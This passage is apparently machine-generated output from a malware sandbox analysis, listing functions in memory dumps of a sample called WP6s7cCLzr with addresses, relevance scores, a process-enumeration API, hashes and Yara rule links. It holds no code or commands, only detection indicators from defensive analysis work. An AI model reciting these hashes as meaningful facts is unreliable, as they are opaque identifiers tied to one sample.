                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 644cbfd58d5d00e8e8224dc31df94c7c33f51e57649b55f4b2c47ecb65a58adc
                                                      • Instruction ID: 9553c44e88e2b8d9245a1af41529ecf4b83de463da8daf22641e1d80fdaa007e
                                                      • Opcode Fuzzy Hash: 644cbfd58d5d00e8e8224dc31df94c7c33f51e57649b55f4b2c47ecb65a58adc
                                                      • Instruction Fuzzy Hash: A561D1EB12C215BCB902D1916F54EFB676EE5C77B0F30882BF803D6202E2944B5AD131
                                                      Function 077D0329 Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Process32FirstW.KERNEL32(?,?,?,?), ref: 077D0383
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893619497.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_77d0000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 48f0a3f3047dde10224842a05ebf06e2c62a8b9a46850ae23cff96c8c2db86a8
                                                      • Instruction ID: 306006e8256afa531084ae98dd2f18187d8380ca1e2c8ced8b6cd888764f5b83
                                                      • Opcode Fuzzy Hash: 48f0a3f3047dde10224842a05ebf06e2c62a8b9a46850ae23cff96c8c2db86a8
                                                      • Instruction Fuzzy Hash: 9B115CD716C151BEA10380951B68EF61B3EE4D37B1F38A53AF403D6902D3884E4EC172
                                                      Function 07770A34 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: a1a6193554ad6b1f5c2b32c86fe7edbe88661ea0bd76f11d6bc91259ed532ef1
                                                      • Instruction ID: 09dd165dad6e76c82d0ca2f4c3910a3c45d8831d66b285d7366f7ccdb8a83d13
                                                      • Opcode Fuzzy Hash: a1a6193554ad6b1f5c2b32c86fe7edbe88661ea0bd76f11d6bc91259ed532ef1
                                                      • Instruction Fuzzy Hash: 8351D2EB12C215BCB902D1916F54EFB676EE5D77B0F30882BF807D6602E2844B5AD131
                                                      Function 07770A17 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 3d268d5c8b881c3369fce059fa68eafd2e949741d43210054dfe93bac5bf54e3
                                                      • Instruction ID: be6733cd30fae1b04adb5a8f2e382a70e3289216453e82188353ea9437abd2dd
                                                      • Opcode Fuzzy Hash: 3d268d5c8b881c3369fce059fa68eafd2e949741d43210054dfe93bac5bf54e3
                                                      • Instruction Fuzzy Hash: EC51D2EB12C215BCB902C5916F54EFBA76EE5C77B0F30882BF807D6602E2844B59D131
                                                      Function 07770A4E Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 52f59d0511ab5dedd10c06bc9f3e567c4fa871972bcdddd450c1dce7d03f7802
                                                      • Instruction ID: d4a7fc76123e3b32937f0fe14ce07d4c3fac530fdb833dc7befecee76c85a3dc
                                                      • Opcode Fuzzy Hash: 52f59d0511ab5dedd10c06bc9f3e567c4fa871972bcdddd450c1dce7d03f7802
                                                      • Instruction Fuzzy Hash: 3751B1FB12C215BDB902D5916F54EFBA76EE5C77B0B30882BF807D6202E2984B59D131
                                                      Function 07770B17 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: fade2be766ad28b7ef4cc148ea5a656da537e9afd7e64f28b924877f762ca05e
                                                      • Instruction ID: 5769269920301556e9b1b808b328478adbdcb84c110b1e17bdb98531f209cb6d
                                                      • Opcode Fuzzy Hash: fade2be766ad28b7ef4cc148ea5a656da537e9afd7e64f28b924877f762ca05e
                                                      • Instruction Fuzzy Hash: BA51F5EB12C250BDBA12C5916F54EFB676EE5C77B0B30882BF403D6152E2854F5AD132
                                                      Function 07770AF5 Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 8b2b59cfeed0848cb4ab74fce7165d7d8d9028880211d54ae4ce509cf4c5e616
                                                      • Instruction ID: 2a762d2eb8e7af1e913d48e759dfb145c676a829a10a34251b6361189d408bb0
                                                      • Opcode Fuzzy Hash: 8b2b59cfeed0848cb4ab74fce7165d7d8d9028880211d54ae4ce509cf4c5e616
                                                      • Instruction Fuzzy Hash: 4751E4FB12C251BDBA0281516F64EFB6B6EE5C77B0B30886BF403D5152E2944A5ED131
                                                      Function 07770A62 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 15402eae6c998e5c9d36f12b834c6fcfc45ca0e87348e93835caec9d575323aa
                                                      • Instruction ID: ac274e2dc508ea6960de425a37eee561fcba5a924c08f57a0d4aae8369ec1721
                                                      • Opcode Fuzzy Hash: 15402eae6c998e5c9d36f12b834c6fcfc45ca0e87348e93835caec9d575323aa
                                                      • Instruction Fuzzy Hash: 4E51A0EB12C215BDB902C1916F64EFBA76EE5C77B0B30882BF807D5612E2984B5DD131
                                                      Function 07770A81 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 4ec8404ef9a7a5d2cbeb3d90a6a333b488ea7bf05d3ca6e5adbc3825f6246d3c
                                                      • Instruction ID: d8abebbc681bd3f501ae393a367d28694c0f85dd3963da363419adaf762e128e
                                                      • Opcode Fuzzy Hash: 4ec8404ef9a7a5d2cbeb3d90a6a333b488ea7bf05d3ca6e5adbc3825f6246d3c
                                                      • Instruction Fuzzy Hash: 6B51D4FB12C215BDB902C1516F64EFB676EE5C77B0B30882BF807D6242E2984B59D031
                                                      Function 07770A9E Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 82c7697eb2864fdefa062e66f3f5a2385512f36127f53eb941112713c64a8d38
                                                      • Instruction ID: 93cef76a45f8b3e8a2b5d415376eede12d81cf6e08d13acb55d0e37e4cf1ab40
                                                      • Opcode Fuzzy Hash: 82c7697eb2864fdefa062e66f3f5a2385512f36127f53eb941112713c64a8d38
                                                      • Instruction Fuzzy Hash: C851C3FB12C210BDBA0281516F64EFB676EE5C77B0B30886BF407D5212E2985B5DD132
                                                      Function 07770AC9 Relevance: 1.5, Strings: 1, Instructions: 288COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 2ad6ece3718e0b4f5cedc025e4840d2d8b91bc572e7f9224b571ee41546bb50c
                                                      • Instruction ID: 2b6ba1834ebdf29cad8d64983fe5a46f21a0099545af33e8dd325ebe8af38e2f
                                                      • Opcode Fuzzy Hash: 2ad6ece3718e0b4f5cedc025e4840d2d8b91bc572e7f9224b571ee41546bb50c
                                                      • Instruction Fuzzy Hash: 3B5191EB12C214BDBA02C5916F64EFB676EE5C77B0B30842BF807D6212E2954B5AD131
                                                      Function 07770B48 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 1ca20c210aee8e99c132bf0e1e3d606f7afef8249459b2a158dc36d882f00190
                                                      • Instruction ID: d5e5e44ad4bc7a7b8eaa52bb09b9c53b2c58ec8ea4e12219d0a3f73f7c7040a1
                                                      • Opcode Fuzzy Hash: 1ca20c210aee8e99c132bf0e1e3d606f7afef8249459b2a158dc36d882f00190
                                                      • Instruction Fuzzy Hash: C1415CEB12C214BC7902C1926F64EFB676EE5C77B0B30882BF807D5102E2985F5AD135
                                                      Function 07770B66 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 8be2f01c31fb15e3dabc6011db44c68aef55c8fedf09f056c5199c4b9f2c88e8
                                                      • Instruction ID: 4fc19f775f8cf98af33fc700a9eef44907f52339ceec8d61688e11043c743fcf
                                                      • Opcode Fuzzy Hash: 8be2f01c31fb15e3dabc6011db44c68aef55c8fedf09f056c5199c4b9f2c88e8
                                                      • Instruction Fuzzy Hash: 7D4159EB12C214BC7902C1926F64EFB676EE5C77B0B30882BF807D5102E2985E5AD136
                                                      Function 07770B9B Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 427d914ca847655001318d966f264409de00be8676d9eee6833e031e6d77a909
                                                      • Instruction ID: a46d31b000e22a188a791ced02a2de27fae364de401701e5c27cdc79f547bc84
                                                      • Opcode Fuzzy Hash: 427d914ca847655001318d966f264409de00be8676d9eee6833e031e6d77a909
                                                      • Instruction Fuzzy Hash: 32418CFB11C214BD7902C5817F64EFB676EE5C7770B30882BF806D2102E2985E5AD135
                                                      Function 07770B81 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: cc4af3de5267c9b195c2f8eca9ad5c23615da139e62e4c59ad54f362b007d7f1
                                                      • Instruction ID: 22c2cbcfce1f1be30b34fccb8c94a5e6db2d88f2a5df03c41e6efd93d14f7d3f
                                                      • Opcode Fuzzy Hash: cc4af3de5267c9b195c2f8eca9ad5c23615da139e62e4c59ad54f362b007d7f1
                                                      • Instruction Fuzzy Hash: C74149EB12C214BC7902C5926F64EFB676EE5C77B0B30882BF807D5102E2985E5AD136
                                                      Function 07770C21 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: dd1448230e93c3d1707f4da423a30d7d3e9d732aed8f9cf0c7b28b92bab7900d
                                                      • Instruction ID: 94de5ca2122dbc50bb333520c2e19c2cdd298e7bddbeb842900871024f7debe8
                                                      • Opcode Fuzzy Hash: dd1448230e93c3d1707f4da423a30d7d3e9d732aed8f9cf0c7b28b92bab7900d
                                                      • Instruction Fuzzy Hash: C74149EB12D214BC7912C1827F64EFB676EE5C77B0B30882BF806D5102E2985E5AD135
                                                      Function 07770B91 Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: eb0e915489d687885ab6b5703890247a5b0c83c883d1b7edfc119def26c89155
                                                      • Instruction ID: 31585ecb48d43a265de477eba57b09ea5acd80c6813ea6664eda8473e6f71b5e
                                                      • Opcode Fuzzy Hash: eb0e915489d687885ab6b5703890247a5b0c83c883d1b7edfc119def26c89155
                                                      • Instruction Fuzzy Hash: D24137EB12C214BC7912C5926F64EFB676EE5C77B0B30882BF807D5102E2985E5AD136
                                                      Function 07770BF9 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 93835b436e264cc23da249a42fdcbcdcc70a486dc2899c16195e7a2a25fb4355
                                                      • Instruction ID: ad82b67019130e6f80be911e927099372f3722d529357661109bffeeceb08aca
                                                      • Opcode Fuzzy Hash: 93835b436e264cc23da249a42fdcbcdcc70a486dc2899c16195e7a2a25fb4355
                                                      • Instruction Fuzzy Hash: 47415AEB21C214BCBA12C1917B64EFB676EE5C77B0B30882BF806D5102E2955E5ED135
                                                      Function 07770BCD Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 4716546b7e43644206f4eb89c7595854cd3e869d4becc4d9841f77fa7557dd34
                                                      • Instruction ID: 2295ae1b6c43d8e0ac30c260f29d3fafb2ef6a87602d0c8e38c1e371873acfb8
                                                      • Opcode Fuzzy Hash: 4716546b7e43644206f4eb89c7595854cd3e869d4becc4d9841f77fa7557dd34
                                                      • Instruction Fuzzy Hash: 5E4129FB22C215BC7912C1917B64EFB676EE5C77B0B30882BF806D5102E2985E5AD135
                                                      Function 07770BE1 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: d08a2a01d97db08fa48455a471625b1accf440e6b6ee10111cf376218c729eac
                                                      • Instruction ID: 7985a8ec22a7087b90c8133889c8066df50e5294141de6f81abb72a8963e20aa
                                                      • Opcode Fuzzy Hash: d08a2a01d97db08fa48455a471625b1accf440e6b6ee10111cf376218c729eac
                                                      • Instruction Fuzzy Hash: 9B4159FB22D214BD7912C1827F64EFB676EE1C77B0B30882BF806D5102E2985E5AD135
                                                      Function 07770C51 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 4965748ecf330a0939279da73664da467a8245da694475700bde003b17823c51
                                                      • Instruction ID: 4b7243022200ff97d0ec63bf9de1640cc022669e15e86e4a865c80882d328b62
                                                      • Opcode Fuzzy Hash: 4965748ecf330a0939279da73664da467a8245da694475700bde003b17823c51
                                                      • Instruction Fuzzy Hash: 04318FFB22C2107CB902C5913F64AFB576EE5C7770B30C86BF806D1102E2999E5E9136
                                                      Function 07770C81 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: d3a4bec5ee1d4ec4e7c6927e172a00fcf7b90ec960b9f5a335819f11d756cdc8
                                                      • Instruction ID: df0f1cb65283a12de8906afa1e039295d0fa08be2a67c6a456c985e10c6617f9
                                                      • Opcode Fuzzy Hash: d3a4bec5ee1d4ec4e7c6927e172a00fcf7b90ec960b9f5a335819f11d756cdc8
                                                      • Instruction Fuzzy Hash: CF3168FB21C215BDB602D5913F64AFB676EE5C6770B31C82BF802D1006E2989E5E9036
                                                      Function 07770C6E Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: ad3e9c774ac27a2c3eda3fd54f4c7b960f039706cdb2bdf7142c8e6945a89aee
                                                      • Instruction ID: f72502a3227d6a00bdc525196aa3d8635363da329c554108727442b334390cbf
                                                      • Opcode Fuzzy Hash: ad3e9c774ac27a2c3eda3fd54f4c7b960f039706cdb2bdf7142c8e6945a89aee
                                                      • Instruction Fuzzy Hash: 5D3126FB22C215BCB901C5823B64EFB576EE1C7770B31C82BF806D1106E2989E5E9136
                                                      Function 07770CB5 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c#d}
                                                      • API String ID: 0-502914154
                                                      • Opcode ID: 912b4c24aaae4fce57f03489ed3623c259a11d72d0bb96d8b48f50f6086099e4
                                                      • Instruction ID: 531d6c84b1197f82a0912a3dedb30c63524756b51f986165ff0d8a9773bf6678
                                                      • Opcode Fuzzy Hash: 912b4c24aaae4fce57f03489ed3623c259a11d72d0bb96d8b48f50f6086099e4
                                                      • Instruction Fuzzy Hash: AF3106FB25C215BC7902C5827F64EFB576EE1C6770B31C82BF806D1006E2999E5E9136
                                                      Function 07770D51 Relevance: .2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 357434c590e68f0ea195fe467c7d20f182125767e1eb249bde84674ab15a6c4f
                                                      • Instruction ID: e474496b175fae2c03af0247d8cf39e0130d83de1daa41e5f0b17f02aa5d2997
                                                      • Opcode Fuzzy Hash: 357434c590e68f0ea195fe467c7d20f182125767e1eb249bde84674ab15a6c4f
                                                      • Instruction Fuzzy Hash: 763126FB25D2157DBA02C1816F24EFBA77DE6C6770B30C86BF802D1006E2949E5E9136
                                                      Function 07770CEB Relevance: .2, Instructions: 160COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49487a034625ee279597d8416eb49056e52e468171e73953a485023f06b8d00c
                                                      • Instruction ID: 852892dd05cec871110ce457c392e5a7d3e288d1d42a5e9d3e8ea3bbc3033b56
                                                      • Opcode Fuzzy Hash: 49487a034625ee279597d8416eb49056e52e468171e73953a485023f06b8d00c
                                                      • Instruction Fuzzy Hash: 783126FB21D2147DB602C1817F64EFBA77DD6C6770B30C86BF802E5006E2945E5A9136
                                                      Function 07770D72 Relevance: .1, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2b6f0cab7a285d827e9daae7d97cb66b770565362a8c394f2ca6e3442c92387
                                                      • Instruction ID: ee8ed80691b60fcbe7fe1cd0563e4b6b35380e7d24e7442f9a7b3b7f3edd2044
                                                      • Opcode Fuzzy Hash: b2b6f0cab7a285d827e9daae7d97cb66b770565362a8c394f2ca6e3442c92387
                                                      • Instruction Fuzzy Hash: 862115FB25D1147CBA02D5827F68AFB677ED1C67B0B31C82BF806D0006E2949E5E9135
                                                      Function 07770D3B Relevance: .1, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b74c98ce94da283928fba8b9504834c01f9110f866bf907da189b2267f9949f2
                                                      • Instruction ID: 2eb3041a11874933a5b1556b8592dc74bce94a6b6cf1dfcd5ca62a092cdbedec
                                                      • Opcode Fuzzy Hash: b74c98ce94da283928fba8b9504834c01f9110f866bf907da189b2267f9949f2
                                                      • Instruction Fuzzy Hash: 9A2124FB21C1147CBA02D1826F68EFB677ED1C67B0B31C82BF802D0006E2949E5E9136
                                                      Function 07770D29 Relevance: .1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893495449.0000000007770000.00000040.00001000.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7770000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50644cfbaafb337e7c23bfc632f83ca8a5f1553f6fbdaae5835dd3854ef26b5d
                                                      • Instruction ID: a4e0e3bb52a44a3def7ad1152d0783de5fb557f4b0eba688dc884a34c09d008c
                                                      • Opcode Fuzzy Hash: 50644cfbaafb337e7c23bfc632f83ca8a5f1553f6fbdaae5835dd3854ef26b5d
                                                      • Instruction Fuzzy Hash: 7E21E2FB21C1157CB902C1822F68AFB977ED1C6770B30C82BF806D0006E2989E5E9136
                                                      Function 078200D8 Relevance: .1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1419d4624fe21fa8715545b791b9e24bb9bf60356cdb62bdf85e00e5ee6e87c
                                                      • Instruction ID: 74b0f736da2b1ae4fc5f1eb69de6cc189c4a056cda5599dfa7c3977bf66d6f47
                                                      • Opcode Fuzzy Hash: c1419d4624fe21fa8715545b791b9e24bb9bf60356cdb62bdf85e00e5ee6e87c
                                                      • Instruction Fuzzy Hash: 4621D8DB26C138BEF04245415B647B66A1EE7A7735F308536F807EA582A1D54ECA3062
                                                      Function 078200CC Relevance: .1, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1893722645.0000000007820000.00000040.00001000.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7820000_WP6s7cCLzr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e5cf6aa9a4325727fbf990d5e12e5445f9cfe0df4cf7340d8e0a03f6b0808be6
                                                      • Instruction ID: daa02ff3a628382f6a21acac4f768137fb3a5092f1c50b5aa6d8747009d94db1
                                                      • Opcode Fuzzy Hash: e5cf6aa9a4325727fbf990d5e12e5445f9cfe0df4cf7340d8e0a03f6b0808be6
                                                      • Instruction Fuzzy Hash: 982183DB6AC238BEF04345416B64BB62A1EE7A7739F308436F807D9542E1954ECB3062
